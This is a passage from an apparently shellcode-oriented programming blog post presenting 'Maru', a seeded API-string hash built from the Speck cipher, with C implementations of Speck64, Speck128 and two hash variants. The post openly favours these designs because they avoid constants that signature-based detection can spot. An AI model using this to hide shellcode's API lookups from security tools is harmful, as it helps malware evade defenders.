eXtended Tiny Encryption Algorithm. A Feistel cipher, published in 1997 after weaknesses found in TEA. 128-bit keys, and 64-bit block. Has a known constant, 0x9E3779B9 which makes it susceptible to signature based detection. Can be implemented in approx. 80 bytes.

Speck was just the better design for lightweight applications, and can’t be easily identified by signature. (at least not from any constants)

Padding

The padding used is similar to MD4. Instead of length in bits stored as 64-bit integer, only a 32-bit integer is used. Since it will never exceed 256-bits for Maru 1 or 512 bits for Maru 2, there didn’t seem any point using a 64-bit integer.

Speck Parameters

Version 1 is suitable for 32-bit architectures while version 2 is suitable for 64-bit.

Ver. Cipher Block Size Key Size
1 Speck 64 128
2 Speck 128 256

32-bit Architectures

The following is implementation of Speck for Ver. 1

uint64_t speck64_encrypt(const void *buf, const void *key)
{
    uint32_t x0, x1;
    uint32_t k0, k1, k2, k3;
    int      i, t;
    w64_t    r;

    w64_t    *x=(w64_t*)buf;
    w128_t   *k=(w128_t*)key;
    
    // load key
    k0 = k->w[0]; k1 = k->w[1];
    k2 = k->w[2]; k3 = k->w[3];

    // load data
    x0 = x->w[0]; x1 = x->w[1];

    for (i=0; i<27; i++) {
      // encrypt block
      x0 = (ROTR32(x0, 8) + x1) ^ k0;
      x1 =  ROTL32(x1, 3) ^ x0;
      
      // create next subkey
      k1 = (ROTR32(k1, 8) + k0) ^ i;
      k0 =  ROTL32(k0, 3) ^ k1;
      
      XCHG(k3, k2);
      XCHG(k3, k1);    
    }
    // store result
    r.w[0] = x0; r.w[1] = x1;
    return r.q;    
}

64-bit architectures

The following is implementation for Ver.2

void speck128_encrypt(const void *in, const void *key, void *out)
{
    uint64_t x0, x1;
    uint64_t k0, k1, k2, k3;
    uint64_t i, t;

    w128_t   *x=(w128_t*)in;
    w128_t   *r=(w128_t*)out;
    w256_t   *k=(w256_t*)key;
    
    // load key
    k0 = k->q[0]; k1 = k->q[1];
    k2 = k->q[2]; k3 = k->q[3];

    // load data
    x0 = x->q[0]; x1 = x->q[1];

    for (i=0; i<34; i++) {
      // encrypt block
      x0 = (ROTR64(x0, 8) + x1) ^ k0;
      x1 =  ROTL64(x1, 3) ^ x0;
      
      // create next subkey
      k1 = (ROTR64(k1, 8) + k0) ^ i;
      k0 =  ROTL64(k0, 3) ^ k1;

      // rotate left 64-bits
      XCHG(k3, k2);
      XCHG(k3, k1);     
    }
    // store result
    r->q[0] = x0; r->q[1] = x1;    
}

Maru Parameters

The numbers below (excluding Ver.) represent number of bits.

Ver. CPU Construction Padding Key Message Max. Input Output
1 32 Davies-Meyer Merkle-Damgard 64 128 256 64
2 64 Davies-Meyer Merkle-Damgard 128 256 512 128

There are 2 64-bit constants used to initialize H_0 which are not really of any significance.

I just wanted something “random” without using a random number generator. Here is how to generate them using SpeedCrunch.

The 2nd value shown is used to initialize H_0 in both versions. The n-bit seed is xor’d against these values to make the hash output different.

I’ve emphasized the importance of eliminating constants which are not really permutable, and can be used as signatures, so why use them here?

You don’t have to use them. I’m only using here for illustration, but you can generate your own values to initialize H_0 or just use zero instead.

Maru 1

The only real difference between the two would be cipher parameters and local capacity for keys. We use a 32-bit seed here to initialize H_0.

uint64_t maru (const char *key, uint32_t seed)
{
    w64_t     h;
    w128_t    m;
    uint32_t  len, idx, end;

    // initialize H with seed
    h.q = MARU_INIT_H ^ seed;
    
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU_BLK_LEN-4) {
          // no, update H with E
          h.q ^= E(&h, &m);
          // zero M
          memset (m.b, 0, MARU_BLK_LEN);
        }
        // add total len in bits
        m.w[3] = (len * 8);
        idx = MARU_BLK_LEN;
        end++;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      }
      if (idx == MARU_BLK_LEN) {
        // update H with E
        h.q ^= E(&h, &m);
        idx = 0;
      }
    }  
    return h.q;
}

Maru 2

Here, we use a 64-bit seed. The 128-bit result is stored in out parameter.

void maru2(const char *key, uint64_t seed, void *out) 
{
    w128_t  h, c;
    w256_t  m;
    int     len, idx, end;

    // initialize H with seed
    h.q[0] = MARU2_INIT_B ^ seed;
    h.q[1] = MARU2_INIT_D ^ seed;
    
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU2_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU2_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU2_BLK_LEN-4) {
          // no, encrypt H
          E(&h, &m, &c);
          // update H
          h.q[0] ^= c.q[0];
          h.q[1] ^= c.q[1];          
          // zero M
          memset (m.b, 0, MARU2_BLK_LEN);
        }
        // add total len in bits
        m.w[(MARU2_BLK_LEN/4)-1] = (len * 8);
        idx = MARU2_BLK_LEN;
        end++;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      }
      if (idx == MARU2_BLK_LEN) {
        // encrypt H
        E(&h, &m, &c);
        // update H
        h.q[0] ^= c.q[0];
        h.q[1] ^= c.q[1];
        idx = 0;
      }
    }
    memcpy(out, &h, sizeof(h));    
}

Testing

Both versions performed well when tested with Robert G. Browns dieharder tool.

The tests involved setting a string buffer to all 1s and incrementing sequentially to generate hashes, similar to how one might test a PRNG.

  • Maru 1

  • Maru 2

Of course, just because the hash output passed dieharder tests, that doesn’t necessarily mean we have a good hash function, but it’s at the very least a good sign.

Example Hashes

  • Maru 1

  • Maru 2

As you can see above, once the seed value is changed, the hash output also changes.

Summary

We can construct better hashing algorithms for API strings from block ciphers. Maru isn’t intended for digital signatures or mission critical applications that requires robust collision resistant hashing functions, but it is good enough for hashing short strings like API.

Maru is really an idea about how to introduce entropy into the string hashing process, while trying to increase difficulty of string collisions.

You can see full source for Maru hash here.

About Maru the cat

Posted in assembly, programming, shellcode, windows | Tagged , , , , , | Leave a comment